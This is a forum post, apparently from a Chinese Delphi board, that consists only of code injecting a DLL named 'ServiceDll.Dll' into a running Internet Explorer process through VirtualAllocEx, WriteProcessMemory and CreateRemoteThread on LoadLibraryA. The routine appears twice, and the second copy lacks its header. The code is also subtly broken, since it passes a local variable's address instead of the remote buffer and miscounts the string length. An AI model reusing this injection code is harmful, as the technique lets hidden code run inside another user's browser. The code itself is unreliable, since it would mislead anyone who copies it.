G
guest8188
Unregistered / Unconfirmed
GUEST, unregistred user!
procedure TFrmMain.Button2Click(Sender: TObject);
var
pe32 : TProcessEntry32;
dwRemoteProcessId,kernelDll : HWND;
hProcessSnap,hRemoteProcess,hRemoteThread1,RemoteThreadId : THandle;
te :AnsiString;
pszLibFileName : string;
pszLibFileRemote ,fnStartAddr: Pointer;
cb : integer;
NumberOfBytes : DWORD;
b : Boolean;
begin
b:=false;
hProcessSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if hProcessSnap = -1 then
begin
ShowMessage('创建"CreateToolhelp32Snapshot"出错!');
Exit;
end;
pe32.dwSize := SizeOf(TProcessEntry32);
if Process32First(hProcessSnap,pe32) then
begin
te := pe32.szExeFile;
if (Pos('iexplore.exe',te)=0) and (Pos('IEXPLORE.EXE',te)=0) then
begin
while Process32Next(hProcessSnap,pe32) do
begin
te := pe32.szExeFile;
if (Pos('iexplore.exe',te)>0) or (Pos('IEXPLORE.EXE',te)>0) then
begin
dwRemoteProcessId := pe32.th32ProcessID;
b:=true;
break;
end;
end;
end else
begin
b:=true;
end;
end;
if not b then
begin
showmessage('未找到IEXPLORE.EXE进程!');
Exit;
end;
hRemoteProcess:=OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
pszLibFileName:= GetCurrentDir+'/'+'ServiceDll.Dll';
if Not FileExists(pszLibFileName) then
begin
showmessage('Dll文件不存在!');
Exit;
end;
// cb := (1+Length(pszLibFileName)) * SizeOf(Char);//计算dll文件名长度
cb := (Length(pszLibFileName)) * SizeOf(Char);//计算dll文件名长度
pszLibFileRemote := VirtualAllocEx(hRemoteProcess,nil,cb,MEM_COMMIT,PAGE_READWRITE);
if Not WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,
@pszLibFileName,
cb,
NumberOfBytes) then
begin
Showmessage('写入内存出错!');
Exit;
end;
kernelDll := GetModuleHandle('kernel32.dll');
fnStartAddr := GetProcAddress(kernelDll,'LoadLibraryA');
hRemoteThread1 := CreateRemoteThread(hRemoteProcess,
nil,
0,
fnStartAddr,
@pszLibFileName,
0,
RemoteThreadId);
if(hRemoteThread1 <> 0) then
CloseHandle(hRemoteThread1);//关闭远程线程
if(hProcessSnap <> 0 ) then
CloseHandle(hProcessSnap);//关闭进程快照
end;
var
pe32 : TProcessEntry32;
dwRemoteProcessId,kernelDll : HWND;
hProcessSnap,hRemoteProcess,hRemoteThread1,RemoteThreadId : THandle;
te :AnsiString;
pszLibFileName : string;
pszLibFileRemote ,fnStartAddr: Pointer;
cb : integer;
NumberOfBytes : DWORD;
b : Boolean;
begin
b:=false;
hProcessSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if hProcessSnap = -1 then
begin
ShowMessage('创建"CreateToolhelp32Snapshot"出错!');
Exit;
end;
pe32.dwSize := SizeOf(TProcessEntry32);
if Process32First(hProcessSnap,pe32) then
begin
te := pe32.szExeFile;
if (Pos('iexplore.exe',te)=0) and (Pos('IEXPLORE.EXE',te)=0) then
begin
while Process32Next(hProcessSnap,pe32) do
begin
te := pe32.szExeFile;
if (Pos('iexplore.exe',te)>0) or (Pos('IEXPLORE.EXE',te)>0) then
begin
dwRemoteProcessId := pe32.th32ProcessID;
b:=true;
break;
end;
end;
end else
begin
b:=true;
end;
end;
if not b then
begin
showmessage('未找到IEXPLORE.EXE进程!');
Exit;
end;
hRemoteProcess:=OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
pszLibFileName:= GetCurrentDir+'/'+'ServiceDll.Dll';
if Not FileExists(pszLibFileName) then
begin
showmessage('Dll文件不存在!');
Exit;
end;
// cb := (1+Length(pszLibFileName)) * SizeOf(Char);//计算dll文件名长度
cb := (Length(pszLibFileName)) * SizeOf(Char);//计算dll文件名长度
pszLibFileRemote := VirtualAllocEx(hRemoteProcess,nil,cb,MEM_COMMIT,PAGE_READWRITE);
if Not WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,
@pszLibFileName,
cb,
NumberOfBytes) then
begin
Showmessage('写入内存出错!');
Exit;
end;
kernelDll := GetModuleHandle('kernel32.dll');
fnStartAddr := GetProcAddress(kernelDll,'LoadLibraryA');
hRemoteThread1 := CreateRemoteThread(hRemoteProcess,
nil,
0,
fnStartAddr,
@pszLibFileName,
0,
RemoteThreadId);
if(hRemoteThread1 <> 0) then
CloseHandle(hRemoteThread1);//关闭远程线程
if(hProcessSnap <> 0 ) then
CloseHandle(hProcessSnap);//关闭进程快照
end;
]